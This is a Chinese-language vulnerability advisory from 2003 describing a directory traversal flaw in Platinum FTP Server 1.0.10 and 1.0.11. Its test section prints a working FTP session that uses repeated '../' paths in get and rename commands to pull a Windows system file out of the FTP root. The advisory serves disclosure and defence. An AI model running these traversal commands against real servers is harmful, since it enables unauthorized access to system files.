PlatinumFTPServer目录遍历漏洞
发布日期:2003-02-24
更新日期:2003-03-03
受影响系统:PlatinumFTP PlatinumFTP 1.0.11
PlatinumFTP PlatinumFTP 1.0.10
描述:
BUGTRAQ ID:
6925
Platinum FTP Server是一款方便容易管理的FTP服务程序,可使用在各种Windows系统上。
Platinum FTP Server存在目录遍历问题,远程攻击者可以利用这个漏洞以FTP进程权限查看系统获得任意文件。
由于Platinum FTP服务程序对'../'字符缺少正确处理,攻击者提交多个'../'的请求可以绕过FTP ROOT目录限制,以FTP进程权限查看获得系统文件。
<*来源:Pui Kin Ser (
serpuikin@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104610637031244&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Pui Kin Ser (
serpuikin@hotmail.com)提供了如下测试方法:
ftp> get ../../../../windows/system32/cmd2.exe
200 PORT command successful
550 ../../../../windows/system32/cmd2.exe: No such file or directory.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
ftp> rename ../../../../windows/system32/cmd2.exe
To name cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \cmd2.exe
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd2.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 134 bytes received in 0.00Seconds 134000.00Kbytes/sec.
建议:
厂商补丁:
PlatinumFTP
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.platinumftp.com/platinumftpserver.php浏览次数:3930
严重程度:0(网友投票)
